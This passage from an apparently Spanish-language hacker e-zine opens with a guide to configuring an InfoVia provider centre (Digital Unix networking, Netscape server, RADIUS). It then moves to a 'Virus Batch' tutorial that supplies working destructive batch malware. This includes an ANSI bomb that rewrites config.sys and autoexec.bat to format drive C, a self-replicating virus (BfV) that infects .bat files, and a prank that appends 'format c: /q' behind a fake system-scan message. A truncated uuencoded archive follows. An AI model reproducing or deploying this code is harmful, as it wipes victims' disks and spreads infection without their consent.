10.128.10.0 a 10.128.10.255. * Direcciones en Internet (asignadas por el IANA al proveedor): El centro tiene asignada una clase C de direcciones en Internet: Direcciones: 192.168.2.0 a 192.168.2.255 . El servidor de RADIUS del CSIV es el que se encarga de asignar direcciones de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados a ese CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran los ``pools'' de direcciones de InfoVia. . Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene definido un ``pool'' de direcciones que puede asignar dinamicamente a los usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos, uno para los usuarios llamantes al CSIV de Madrid y otro para los usuarios llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes direcciones: * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Madrid. De 192.168.2.129 a 192.168.2.158, es decir un rango de 30 direcciones. * ``Pool'' de direcciones para los usuarios llamantes al CSIV de Barcelona. De 192.168.2.161 a 192.168.2.190, es decir un rango de 30 direcciones. Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un usuario quiere acceder a Internet a traves de este CPI, el cliente de RADIUS del CSIV correspondiente consultara al servidor RADIUS del CPI elegido por el usuario llamante. El equipamiento del CPI es el siguiente: . Una maquina Digital Alphaserver 1000,, equipada con dos tarjetas de interfaz ethernet. El sistema operativo instalado es el Digital Unix 3.2C. . Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos interfaces serie. Solo se van a emplear la interfaz ethernet y una de las interfaces serie. . Un enlace frame relay a 64 Kbit/s con tres PVCs, el 17 (para Internet), el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona). Cada PVC garantiza una velocidad minima de 16 Kbit/s. . La RAL del CPI es Ethernet 10 Base 2. En los proximos apartados se detalla la configuracion de cada una de las maquinas que integran el CPI del ejemplo. 6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX ---------------------------------------- En la maquina Digital UNIX del CPI se han instalado los siguientes servidores: . Un servidor de web Netscape Commerce Server. Se configura de modo que se comporte como dos servidores de web independientes, uno atendiendo a los accesos que llegan por la interfaz tu0 (Internet) y el otro atendiendo los accesos que llegan por la interfaz tu1 (InfoVia). . Un servidor de RADIUS cuya mision es la de asignar dinamicamente las direc- ciones del ``pool'' de direcciones de Internet manejado por el CPI. En los siguientes puntos se detalla la configuracion de la maquina asi como de los diferentes servidores instalados en ella. 6.1.1 Configuracion de direcciones, interfaces y rutas. ------------------------------------------------- La maquina dispone de dos interfaces, la tu0 y la tu1, a las que se le asignan las siguientes direcciones IP: . Direccion IP de la tarjeta tu0 (Internet): 192.168.2.7 . Direccion IP de la tarjeta tu1 (InfoVia): 10.128.10.7 El que la maquina Digital Alphaserver 1000 necesite dos tarjetas de interfaz RAL se debe a que las maquinas Digital UNIX no admiten doble direccion IP. Esta es la unica diferencia apreciable entre el ejemplo del Capitulo 4 y el ejemplo descrito en este capitulo. En el ejemplo se ha supuesto que el proveedor divide la clase C (256 direcciones) que se le ha concedido en subredes de 64 maquinas cada una. Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se asignan direcciones de la clase A 10.0.0.0 reservada por Internet para redes privadas. Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a 10.127.255.255 para los usuarios, mientras que las direcciones 10.128.0.0 a 10.255.255.255 para los CPIs. De acuerdo con esto, las mascaras correspondientes seran: . Mascara para la direccion IP de Internet: 255.255.255.192 . Mascara para la direccion IP de InfoVia: 255.128.0.0 En lo que a rutas se refiere, ha de habilitarse una ruta que permita encaminar el trafico de los usuarios de InfoVia y el trafico con el CSIV. En esta ruta, todo el trafico de las direcciones que van de la 10.0.0.0 a la 10.127.255.255, ha de encaminarse a traves del ``router'' del CPI, el 10.128.10.1, y ademas permite que los paquetes salientes de la maquina tengan como direccion origen la de InfoVia. Los ficheros necesarios para configurar las direcciones son: . /etc/hosts . /etc/rc.config El contenido de estos ficheros se muestra en los siguientes subapartados. La configuracion de la red se realiza utilizando la herramienta netsetup del menu de configuracion del sistema. 6.1.1.1 Fichero /etc/hosts ------------------ En este fichero se asocian las direciones IP de las maquinas con sus nombres. Se editara este fichero y se añadiran las siguientes lineas: # 127.0.0.1 localhost 192.168.2.7 alphaosf.digital.es alphaosf 192.168.2.1 router router-Internet 10.128.2.7 digital.inf alphaosf-infovia 10.128.2.1 router-infovia router-inf 10.1.1.2 Fichero /etc/rc.config En este fichero se le indica a la maquina su nombre, asi como las interfaces configuradas y las distintas opciones de configuracion de la red activadas utilizando la herramienta netsetup. En este fichero se pueden configurar y activar, o activar, interfaces, asi como definir el tipo de encaminamiento (``routing'') utilizado. El fichero debe contener las siguientes lineas indicando el numero de interfaces definidas y la configuracion de estas. #!/bin/sh #HOSTNAME - host name of the system # #NUM_NETCONFIG - number of network devices currently configured # #MAX_NETDEVS - maximun number of network devices that can be configured # which is currently set by netsetup to a value of 16 # #NETDEV_n - network device name for network devices currently # configured, where n is 0 to MAX_NETDEVS- 1 # for example, NETDEV_0=''ln0'' # #IFCONFIG_n - ifconfig parameters for network devices currently # configured, where n is 0 to MAX_NETDEVS - 1 # (see ifconfig(8) manual page) # for example, IFCONFIG_0=''130.124.1.20 netmask 255.255.255.0'' # #RWHOD - ``yes'' if rwhod is enabled, blank or ``no'' if rwhold is disabled # #ROUTED - ``yes'' if routed is enabled, blank or ``no'' if routed is disabled # #ROUTED_FLAGS - routed flags (see routed(8) manual page) # #ROUTER - ``yes'' if the system is set up to be an Internet Protocol router, # otherwise, blank or ``no'' # #GATED - ``yes'' if gated is enabled, blank or ``no'' if gated is disabled # #GATED_FLAGS - gated flags (see gated(8) manual page) # DISPLAYTYPE= HOSTNAME=''alphaosf'' NUM_NETCONFIG=''2'' MAX_NETDEVS=''24'' NETDEV_0=''tu0'' NETDEV_1=''tu1'' NETDEV_2= NETDEV_3= NETDEV_4= NETDEV_5= NETDEV_6= NETDEV_7= IFCONFIG_0=''192.168.2.7 netmask 255.255.255.192'' IFCONFIG_1=''10.128.10.7 netmask 255.128.0.0'' IFCONFIG_2= IFCONFIG_3= IFCONFIG_4= IFCONFIG_5= IFCONFIG_6= IFCONFIG_7= RWHOD=''no'' ROUTED=''yes'' ROUTED_FLAGS=''-q'' ROUTER=''no'' GATED=''no'' GATED_FLAGS= PAGERAW=''1'' PAGEFILE=''/dev/rz1b'' PARTITION=''rz1b'' PARTITIONTYPE=''RZ2SL'' PAGEMINSZ=0 PAGEMAXSZ=0 QUOTA_CONFIG= export DISPLAYTYPE HOSTNAME NUM_NETCONFIG QUOTA_CONFIG export NETDEV_0 NETDEV_1 NETDEV_2 NETDEV_3 NETDEV_4 NETDEV_5 NETDEV_6 NETDEV_7 export IFCONFIG_0 IFCONFIG_1 IFCONFIG_2 IFCONFIG_3 IFCONFIG_4 IFCONFIG_5 export IFCONFIG_6 IFCONFIG_7 RWHOD ROUTED ROUTED_FLAGS GATED GATED_FLAGS export ROUTER MAX_NETDEVS export PAGERAW PAGEFILE PARTITION PARTITIONTYPE PAGEMINSZ PAGEMAXSZ LAT_SETUP=''1'' export LAT_SETUP 6.1.1.3 Nombre de la maquina -------------------- En este fichero se incluyen las rutas necesarias para encaminar adecuadamente el trafico del CPI. Para que el CPI pueda encaminar el trafico de los usuarios llamantes a InfoVia y que los paquetes con destino a esos usuarios tengan como direccion origen la de InfoVia, hay que definir la siguiente ruta: -net 10.0.0.0 10.128.10.1 Para que el CPI pueda encaminar la informacion con destino al cliente RADIUS del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del CSIV al que se conecta el CPI, debe incluirse en este fichero la ruta: -net 172.16.0.0 10.128.10.1 Para configurar la ruta por defecto, en este fichero ha de incluirse la siguiente ruta: default 192.168.2.1 Para incluir todas estas rutas, se debe utilizar la herramienta netsetup del menu de configuracion del sistema. El fichero resultante de añadir estas rutas es el siguiente: -net 10.0.0.0 10.128.10.1 -net 172.16.0.0 10.128.10.1 default 192.168.2.1 6.1.2 Configuracion del servidor de web --------------------------------- Se ha instalado un unico servidor web Netscape (se trata del Netscape Commerce Server) en la maquina UNIX. El servidor queda instalado en el directorio: /usr/ns-home Para facilitar la configuracion del servidor Netscape, existe un segundo servidor instalado en otro puerto que no es el estandar (el puerto estandar es el 80). Para saber cual es el puerto no estandar se ha de ejecutar el comando: /usr/ns-home/start-admin Una vez ejecutado este comando se sabe cual es el puerto al que hay que conectarse para configurar el servidor Netscape, tanto para el caso de la interfaz tu0 como el de la interfaz tu1. Para la configuracion y arranque del servidor Netscape se ha dispuesto de un terminal X-Windows. En este terminal existia un cliente Netscape, por medio del cual, conectandose al puerto no estandar de la maquina, se configuro el servidor Netscape. Al configurarlo se ha hecho de forma tal que se comporte como dos servidores independientes, uno con la direccion IP 192.168.2.7 (la correspondiente a la interfaz tu0 del servidor) y otro con la direccion IP 10.128.10.7 (la correspondiente a la interfaz tu1 del servidor). De este modo, la configuracion del servidor Netscape se ha podido hacer por medio de paginas web, lo que simplifica el trabajo y evita editar todos los ficheros de configuracion que se adjuntan en este apartado. El servidor web para Internet esta configurado para ``escuchar'' por el puerto 443, el puerto estandar para transacciones seguras del protocolo SSL (Secure Sockets Layer) del Netscape Commerce Server, mientras que el servidor web para InfoVia esta configurado para utilizar el puerto 80, estandar para paginas web. En el fichero admpw se define la clave (``password'') necesaria para la configuracion remota, por medio de un cliente Netscape del servidor Netscape. En el ejemplo, este fichero esta en el directorio /usr/ns-home/admserv/. Una vez explicado como se puede configurar de forma remota el servidor, se puede pasar a ver en detalle los ficheros de configuracion del mismo. El fichero ejecutable del servidor Netscape es: /usr/ns-home/bin/httpd/ns-httpd Para que el unico servidor se comporte como si se tratase de dos servidores independientes, uno para cada una de .las direcciones IP asignadas a la maquina, se han creado los directorios: Configuracion del servidor web para Internet (direccion IP 192.168.2.7): El directorio de configuracion del servidor: /usr/ns-home/httpd-443.192.168.2.7/config El directorio en el que se almacenan los ficheros con las conexiones (``logs'') al servidor de Internet: /usr/ns-home/httpd-443.192.168.2.7/logs Los ficheros ejecutables: /usr/ns-home/httpd-443.192.168.2.7/restart /usr/ns-home/httpd-443.192.168.2.7/rotate /usr/ns-home/httpd-443.192.168.2.7/start /usr/ns-home/httpd-443.192.168.2.7/stop Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7): El directorio de configuracion del servidor: /usr/ns-home/httpd-80.10.128.2.7/config El directorio en el que se almacenan los ficheros con las conexiones (``logs'') al servidor de InfoVia: /usr/ns-home/httpd-80.10.168.10.7/logs Los ficheros ejecutables: /usr/ns-home/httpd-80.10.128.10.7/restart /usr/ns-home/httpd-80.10.128.10.7/rotate /usr/ns-home/httpd-80.10.128.10.7/start /usr/ns-home/httpd-80.10.128.10.7/stop Para configurar el servidor web Netscape, y que se comporte como dos servidores independientes, han de configurarse los siguientes ficheros: Configuracion del servidor web para Internet (direccion IP 192.168.2.7): El directorio de configuracion del servidor: /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7): El directorio de configuracion del servidor: /usr/ns-home/httpd-80.10.128.10.7/config/magnus.conf /usr/ns-home/httpd-80.10.128.10.7/config/obj.conf Para el arranque del ``servidor'' de Internet, se ha de ejecutar el comando. /usr/ns-home/httpd-443.192.168.2.7/start Para el arranque del ``servidor'' de InfoVia, se ha de ejecutar el comando. /usr/ns-home/httpd-80.10.128.10.7/start La ruta de acceso (``path'') de los ficheros anteriores no tiene por que ser esa, ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo que aqui se presentan, se ha instalado el servidor en el directorio /usr/ns-home. 6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf ------------------------------------------------------------- #ServerRoot /usr/ns-home/https-443.192.168.2.7 Port 443 Address 192.168.2.7 LoadObjects obf.conf RootObject default ErrorLog /usr/ns-home/https-443.192.168.2.7/logs/errors PidLog /usr/usr/ns-home/https-443.192.168.2.7/logs/pid User httpd ServerName alphaosf.telefonica.es Security off MinProcs 16 MaxProcs 32 DNS on Init fn=load-types mime-types= mime-types Init fn=init-clf global=/usr/ns-home/https-443.192.168.2.7/logs/access secure=/usr/ns-home/https-443.192.168.2.7/logs/secure 6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf ---------------------------------------------------------- <Object name=default> NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons'' NameTrans fn=document-root root=''/usr/ns-home/docs/internet'' PathCheck fn=unix-uri-clean PathCheck fn=find-pathinfo PathCheck fn=find-index index-names=''index.html,home.html'' ObjectType fn=type-by-extension ObjectType fn=force-type type=text/plain Service method=(GET|HEAD) type=magnus-internal/imagemap fn=imagemap Service method=(GET|HEAD) type=magnus-internal/directory fn=index- common Service method=(GET|HEAD) type=*ömagnus-internal/* fn=send-file AddLog fn=common-log AddLog fn=record-keysize name=secure </Object> <Object name=cgi> ObjectType fn=force-type type=magnus-internal/cgi Service fn=send-cgi </Object> 6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf ----------------------------------------------------------- #ServerRoot /usr/ns-home/https-443.192.168.2.7 Port 80 Address 10.128.2.7 LoadObjects obf.conf RootObject default ErrorLog /usr/ns-home/https-80.10.128.2.7/logs/errors PidLog /usr/usr/ns-home/https-80.10.128.2.7/logs/pid User httpd ServerName alphaosf-infovia.telefonica.inf Security off MinProcs 16 MaxProcs 32 DNS on Init fn=load-types mime-types= mime-types Init fn=init-clf global=/usr/ns-home/https-80.10.128.2.7/logs/access secure=/ usr/ns-home/https-80.10.128.2.7/logs/secure 6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf -------------------------------------------------------- <Object name=default> NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons'' NameTrans fn=document-root root=''/usr/ns-home/docs/internet'' PathCheck fn=unix-uri-clean PathCheck fn=find-pathinfo PathCheck fn=find-index index-names=''index.html,home.html'' ObjectType fn=type-by-extension ObjectType fn=force-type type=text/plain Service method=(GET|HEAD) type=magnus-internal/imagemap fn=imagemap Service method=(GET|HEAD) type=magnus-internal/directory fn=index- common Service method=(GET|HEAD) type=*ömagnus-internal/* fn=send-file AddLog fn=common-log AddLog fn=record-keysize name=secure </Object> <Object name=cgi> ObjectType fn=force-type type=magnus-internal/cgi Service fn=send-cgi </Object> 6.1.3 Configuracion del servidor RADIUS --------------------------------- El CPI elegido para el ejemplo permite el acceso a Internet a traves de InfoVia. Por lo tanto, debera instalarse en la maquina UNIX del CPI un servidor RADIUS que gestione el ``pool'' de direcciones de Internet y las vaya asignando a los usuarios llamantes. En el ejemplo propuesto, este ``pool'' de direcciones IP asignadas por el IANA al proveedor esta dividido a su vez en dos rangos, uno para el CSIV de Madrid, y otro para el CSIV de Barcelona. El rango asignado al primer CSIV es el que va de la direccion 192.168.2.129 a la 192.168.2.158. El rango asignado al segundo CSIV es el que va de la direccion 192.168.2.161 a la 192.168.2.190. En el ejemplo, el servidor RADIUS se ha instalado en el directorio: /usr/users/prueba/radius_osf Para obtener el fichero ejecutable del servidor, los ficheros fuente del servidor RADIUS deberan compilarse para una maquina UNIX de Digital. El fichero ejecutable se ha situado en el directorio /usr/users/prueba/radius_osf. Para el arranque del servidor, desde el directorio anterior ha de ejecutarse el comando: nohup ./radiusd -d & Si se quieren trazas del servidor, en el directorio /usr/users/prueba/radius_osf deberan ejecutarse los siguientes comandos: touch Activar.radius1 touch Activar.radius2 El servidor estara activo si al ejecutar el comando: ps ax | grep radiusd Se obtiene una respuesta del tipo: prueba 24024 23998 4 16:28:00 pts/1 0:00 grep radiusd prueba 22623 171Oct 16 pts/0 0:01 radiusd -d . La opcion con la que se arranca el servidor RADIUS es: -d <nombre_del_directorio_radius> Los ficheros de configuracion del servidor, almacenados en el directorio /usr/users/prueba/radius_osf, son los mismos que se indicaron en el apartado 4.1.3 del Capitulo 4. 6.1.4 Configuracion del servidor DNS ------------------------------ Para la configuracion del servidor DNS se recomienda consultar el apartado 4.1.4 y el apartado 6.1.5 de este documento. 6.2 CONFIGURACION DEL ``ROUTER'' ---------------------------- Al emplearse en este ejemplo el mismo ``router'' que en ejemplo del Capitulo 4, el fichero de configuracion es el mismo que el incluido en el apartado apartado 4.2 de este documento. 7 INFORMACION ADICIONAL PARA LA INSTALACION DE UN CPI =================================================== Telefonica ofrece a los proveedores de informacion, el codigo, compilado para diversas plataformas, del servidor RADIUS. Con el proposito de facilitar la distribucion de software, el codigo compilado para los diferentes tipos de plataforma esta disponible en un servidor ftp anonimo. 8 PROCESO ADMINISTRATIVO ====================== Una empresa que desee ofrecer sus servicios a traves de InfoVia debera completar un formulario en el que los principales apartados seran los siguientes: . Objetivo del servicio. Se expondra el tipo de servicio que se va a ofertar, que debera de ser publico y no restringido, asi como su nombre comercial. Esta informacion permitira definir a InfoVia cual debe de ser la ubicacion en el arbol de navegacion de este servicio. . Contenido de la hoja HTML El proveedor debera entregar un fichero con formato HTML, o bien delegar la funcion de creacion de dicho fichero a InfoVia. La importancia de este fichero queda clara teniendo en cuenta que sera la unica informacion especifica que InfoVia suministrara a los hipoteticos usuarios del proveedor del servicio sobre las caracteristicas del mismo. Se sugiere que en este apartado debe quedar claro para los usuarios: - El tipo de servicio comercializado. - Procedimiento administrativo para darse de alta en el servicio si fuera necesario. - Costes asociados a la utilizacion del servicio, asi como el procedimiento de cobro (tarjeta de credito, factura mensual, etc ...). - Caracteristicas que debe poseer el equipamiento del usuario: Memoria, CPU, velocidad de transferencia, etc ... - Si el usuario debe de instalar software especifico para acceder a este servicio, se debe de indicar el mecanismo de acceso a dicho software. - Ambito geografico del servicio. Si el servicio se va a ofrecer a usuarios de una comunidad autonoma o a varias y cuales. . Numero de maquinas desde las que se va a ofertar el servicio. - El proveedor informara en este apartado cuantas maquinas van a ser accesibles desde InfoVia para la provision del servicio. . Tipo de servicio. - Autentificado o no autentificado - Administracion de la direcciones IP por parte del proveedor o administradas por InfoVia. Si el proveedor desea administrar un rango de direcciones propias (direcciones de Internet, como es el caso de los CPIs con acceso a Internet desde InfoVia), debera acreditar que dichas direcciones le han sido adjudicada por la IANA. . Numero maximo de usuarios simultaneamente conectados al proveedor. En este apartado, el proveedor informara del numero maximo de conexiones simultaneas que quiere atender por cada una de las comunidades autonomas. . Caracteristicas del acceso fisico a InfoVia. El usuario debera de indicar el tipo de acceso deseado: - Frame relay: Parametros asociados a la interfaz frame relay. El proceso administrativo de dar de alta estas interfaces, lo podra realizar el proveedor o delegarlo en InfoVia. Al proveedor del servicio, como respuesta a su peticion, se le suministraran los siguientes datos: . Rango de direcciones IP reservadas al proveedor. Sera siempre una subred de longitud 256 direcciones. . Direcciones IP concretas asignadas a las maquinas del proveedor. Seran direcciones pertenecientes al rango anterior a traves de las cuales se oferta el servicio. . Direccion IP del servidor de RADIUS. . Direccion del centro de gestion InfoVia. Se le suministrara la direccion RTB y X.25, asi como la clave (``password'') que permitiran al proveedor del servicio acceder a los datos de trafico de su servicio. Toda esta informacion se recogera en un documento con formatos y campos a rellenar, en los que el proveedor se sometera a las leyes civiles que rigen estas asociaciones y que quedaran ampliamente aclaradas y enumeradas. Este proceso formal podra ser discutido en forma y contenido, pero es Telefonica, o en su caso la filial que comercialice el servicio InfoVia, la que sera competente en estas labores y la que detallara mas profundamente todos estos aspectos, asi como las acciones a seguir para incorporarse a InfoVia. GLOSARIO DE TERMINOS Y ACRONIMOS AUI: ``Attachment Unit Interface''. CGIV: Centro de Gestion InfoVia. CPI: Centro Proveedor de Informacion. CSIV: Centro de Servicio InfoVia. FTP: ``File Transfer Protocol''. GSM: ``Global System Mobile communication''. HDLC: ``High-level Data Link Control''. HTML: ``HyperText Markup Language''. IANA: ``Internet Assigned Numbers Authority''. IP: ``Internet Protocol''. LAN: ``Local Area Network'' (red de area local). NCSA: ``National Center for Supercomputing Applications''. PVC: ``Permanent Virtual Circuit'' (Circuito Virtual Permanente). RAL: Red de Area Local. RDSI: Red Digital de Servicios Integrados. RFC: ``Requests For Coments''. RTB: Red Telefonica Basica. SIU: ``Signaling Interface Unit''. TCP/IP: ``Transfer Control Protocol/Internet Protocol''. UDP: ``User Datagram Protocol''. UTR: Unidad de Terminacion de Red. Eso es todo amigos: "Imagination is more important than knowledge" A. Einstein -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ─[ VIRUS BATCH (2a Parte) - Yo_Soy ]────────────────────────────────────────── <« VIRUS BATCH 2/2 »> Hace tiempo que escribi la primera parte, algo confusa, espero no hacerlo de nuevo, esta segunda guia mostrara parte la creacion de cualquier batch. Bueno, antes de cualquier otra cosa, esta vez explicare los elementos a los cuales vamos a tratar, ya que recibi mail de personas que no entendian el proceso, si ya conoces todo esto, puedes saltarlo. -═[ ARCHIVOS BATCH ]═- Variables Redireccion Comentarios Etiquetas Desiciones ══> VARIABLES Los archivos batch (bat) utilizan el signo de porcentaje para señalar las variables ( %var1% , %var2% , etc.) y se utiliza el comando "set" para asignar variables y borrarlas. Ejemplo: @echo off <= No muestra los comandos en pantalla. set var1=RareGaZz <= Asigna a la primer variable RareGaZz set var2=E-Zine <= Asigna a la segunda variable E-Zine echo %var1% %var2% <= Muestra en pantalla los valores de las 2 variables. set var1= <= Elimina la primer variable set var2= <= Elimina la segunda variable Espero que este ejemplo haya sido claro. ══> REDIRECCION Redireccionamos la salida del programa a otros lugares, como por ejemplo, a un archivo, añadir a un archivo, y a otro programa, asi: > Envia la salida a un archivo. >> Añade la salida a un archivo. | Envia la salida a un programa. Ejemplo: @echo off cls echo mando este mensaje al archivo prueba.txt >prueba.txt echo ahora añado este otro mensaje a prueba.txt >>prueba.txt echo. echo. echo. Pulse enter para continuar. pause>nul type autoexec.bat | more Ok, cuando use "pause>nul" lo que hice fue redireccionar la salida a nada. Asi no sale nada en pantalla, despues "type autoexec.bat | more" lo que hice fue ver el contenido del autoexec.bat y mandar la salida a el comando more, asi me lo despliega pantalla por pantalla. ══> COMENTARIOS Y ETIQUETAS Los comentarios pueden ir utilizando el comando REM y opcionalmente lo mas recomendado a la hora de poner comentarios seran con dos veces dos puntos. A diferencia de la programacion en otros lenguajes los comentarios no van en la misma linea que el codigo. Las etiquetas se utilizaran solo colocando dos puntos antes de la etiqueta ( una vez ) y el comando "goto" lo que hace es transferir el control del programa a otra parte del archivo. Ejemplo: :: prueba de goto y comentario :: este es un comentario @echo off goto fin Este texto puede ser lo que sea porque nunca saldra en la pantalla :fin echo Listo. ══> DECISIONES Las decisiones en Batch seran utilizando el comando "If" que lo que hace es evaluar una condicion y si es correcta, ejecuta un comando. Puede ser utilizada para comparar una cadena de caracteres con otra, ver si existe un archivo determinado o el errorlevel de otro programa, asi: if [not] cadena1==cadena2 comando Compara la cadena1 con la cadena2, y si es verdadero ejecuta el comando. if [not] exist rare015.txt comando Si existe el archivo rare015.txt entonces ejecuta el comando. Ejemplo: @echo off :: Prueba de la forma "If" cls IF EXIST C:\WINDOWS\NULL echo Windows existe. IF NOT EXIST C:\YO-SOY echo no existe el directorio Yo-Soy echo. Fin. if [not] ERRORLEVEL numero comando Evalua el ultimo ErrorLevel presentado por un programa, este es dado para informar como termino el programa (si finalizo como deberia o hubo errores, etc.) No todos los programas presentan esto y se pierde el errorlevel cuando otro programa se ejecuta. Not puede ser opcional. El errorlevel nos sera util a la hora de usar el comando CHOICE, para crear menus y otras cosas. El comando Choice lo que hace es preguntar una tecla de una serie y asignarle un errorlevel en consecuencia a la tecla presionada. Ejemplo: @echo off :menu cls echo MENU SIMPLE echo ═══════════ echo. echo 1 - Ejecutar Editor echo 2 - Ejecutar Windows XD echo S - Salir choice /c:12S>nul if errorlevel 3 goto fin if errorlevel 2 goto windows if errorlevel 1 goto editor echo Falta el comando CHOICE goto fin :editor edit goto menu :windows cd \windows win goto menu :fin Los Errorlevels dependen mucho de la posicion que le asignes, ejemplo: CHOICE /C:ABCD ││││ │││└─> Da Errorlevel 4 ││└──> Da Errorlevel 3 │└───> Da Errorlevel 2 └────> Da Errorlevel 1 CHOICE /C:2567 Presionando 2 nos regresa un Errorlevel de 1, 5 errorlevel de 2, 6 de 3, y 7 de 4. Bueno, creo que con esto explico lo basico, si necesitas algo mas, puedes ver en el HELP del Dos. -═[ VIRUS ]═- Los Virus Batch como su nombre lo indica estan creados en Batch, estos pueden contener rutinas en ANSI (Bombas Ansi), estas funcionan en Win95 (en cualquier sistema basado en Ms-Dos). Veamos uno. El disco duro muere despues de que reinicie el sistema, y no hara nada hasta que el presione Enter por lo menos una vez en DOS (no muy dificil de cumplir). ─────────────────────────────[ ANSI.BAT ]──────────────────────────────── @echo off :: Para que funcione debe de cargarse el controlador ANSI, para ello :: vamos a introducirlo en el config.sys para que se cargue la proxima :: vez que se inicie. copy c:\config.sys c:\temp.sys deltree /y c:\config.sys ren c:\temp.sys config.sys :: En caso de ke el config.sys este protegido contra escritura if exist C:\dos\ansi.sys goto DOS goto Winblows :DOS echo DEVICE=C:\DOS\ANSI.SYS >> c:\config.sys goto auto :: Si la persona esta corriendo DOS entonces añade esa linea para cargar :: el controlador ANSI la proxima vez que inicie. if exist C:\windows\command goto Winblows :WINBLOWS echo DEVICE=C:\WINDOWS\COMMAND\ANSI.SYS >> c:\config.sys :: Esta linea se añade al config.sys si esta utilizando Windows. :: Ahora la parte importante :: Vamos a meter unas cuantas lineas al autoexec.bat :: para que la proxima vez que inicie BOOM =) :AUTO echo prompt $e[0;30m >> c:\autoexec.bat :: La pantalla se volvera negra. echo prompt $e[13;0;80;99;58;13;99;100;92;13;102;111;114;109;97;116;32;99;58;32;47;113;32;"/t:20 /n:50";13;121;13; >> c:\autoexec.bat :: Formatea rapidamenta su disco duro, aprox. 20-30 segundos :: Hace un Formateo a bajo nivel, jode el disco duro =) echo prompt [0m >> c:\autoexec.bat echo prompt $p$g >> c:\autoexec.bat :: Regresa la pantalla a la normalidad. if exist c:\windows\command goto COMMAND goto END :COMMAND echo c:\command.com >> c:\autoexec.bat :: En caso de que tenga Win95, comenzara en DOS... :: y asi la bomba se ejecuta y vale madres... :END ──────────────────────────────[ FIN ]───────────────────────────────────── He aqui unos ejemplos de unos virus. ────────────────────────────[ BfV.BAT ]─────────────────────────────────── [ BfV ] @echo off%[BfV_B]% if '%1=='## goto BfV_%2 if exist C:\_BfV.bat goto BfV_ if not exist %0.bat goto BfV_end find "BfV"<%0.bat>C:\_BfV.bat attrib C:\_BfV.bat +h :BfV_ command /e:5000 /c C:\_BfV ## run goto BfV_end :BfV_run for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i exit BfV :BfV_inf if '%BfV%=='1111111 exit set BfV=%BfV%1 find "BfV"<%3>nul if not errorlevel 1 goto BfV_end type %3>BfV type C:\_BfV.bat>>BfV move BfV %3>nul exit BfV :BfV_end ─────────────────────────────────────────────────────────────────────────── Tambien puedes hacer maldades poco eticas, como por ejemplo: @echo off CLS ECHO. @echo off >>c:\autoexec.bat ECHO. echo Su sistema no termino como deberia, ahora se realizara >>c:\autoexec.bat ECHO. echo una exploracion rutinaria en su sistema. >>c:\autoexec.bat ECHO. ECHO. echo Buscando fallos en su sistema... >>c:\autoexec.bat ECHO. echo por favor espere.. >>c:\autoexec.bat ECHO. format c: /q >>c:\autoexec.bat echo. Echo Ningun problema fue detectado >>c:\autoexec.bat Ademas, podemos hacer nuestro archivo.bat en .exe o .com con las siguientes utilidades o bajandolas directamente de la pagina de RareGaZz ;). Las posibilidades son muchas, podemos combinarlos con las Nowhere Utilities, jugarle una broma a un amigo, etc. ──────────────────────────[ CORTAR AQUI ]────────────────────────────────── begin 666 BATCH.ZIP M4$L#!!0``@`(`%%-+1WS?VK^TQ(``(P8```,````0D%40TA#3TTN15A%E3AM M5!17EJ]>]0<T=(,$\2.&+CQ(/G!Z#&VRB39$A*9E%!H:[`;:-(/:1'84W.HJ M>\QFQW)[HS8ON)F=<V;FG#V;L]F8F7.0.#KVY@"]*MH&QB1DHSFCF9@9$TUF MBJF)&<%1$.C:^ZI!<V9_[-DZ4%WOWOONU[OOOGO?V/O8;%I?WEBQH<)=PY78 MGN(>V_8X]^2SS]I7TO=J;D.P3=C1T-4N<`U=.T6AHZLSQ,%C,OOX#D$(=G+K M]W)<DJOIV+:C+;@S10[8PJ755<CCK$%5;@]R5FQP(Y>[T8V<3=6-J*Y\<X,3 M-6RHKFI$#<Y&5%&^:1,`&S>@.H^[I@X`E:BF$GDJ4<6F!E19[4&5SDW`K!9Y MG1[D=6]"%8V-S0A4KD.-S75.5.&N:T:5Y8U.U%A=XT1.3SGPK]A`9]9LI&]/ M#7VO]SC+-U(^Y4`$+)TP`3A65P$O=TU->6TE0EP:9SZ8+F42$V>^EVDVK\N\ MGO%HYEIX=V8LR7!Z/&[/)J<7YC95-S1^NX)#J6<V"]U_5!7]KZ<Q4!.H:RU\ MTE904/!@6*(-7WD8Z>@<&RB!N&\^9I.3Y[MXKJ.3V]G1&>0*:X/![5RENP$6 M:A4'B!=X<'>0+S2;&O9V"FW?7\/=7\KVCIW!SK9=05OP^X+95%C1UOFH`,#. M[<!MMRAH^,+:+H$+=G:)+^S@=@5W=?%[`?(-/!?:'=S6T=X1W%XXSY(+=;P8 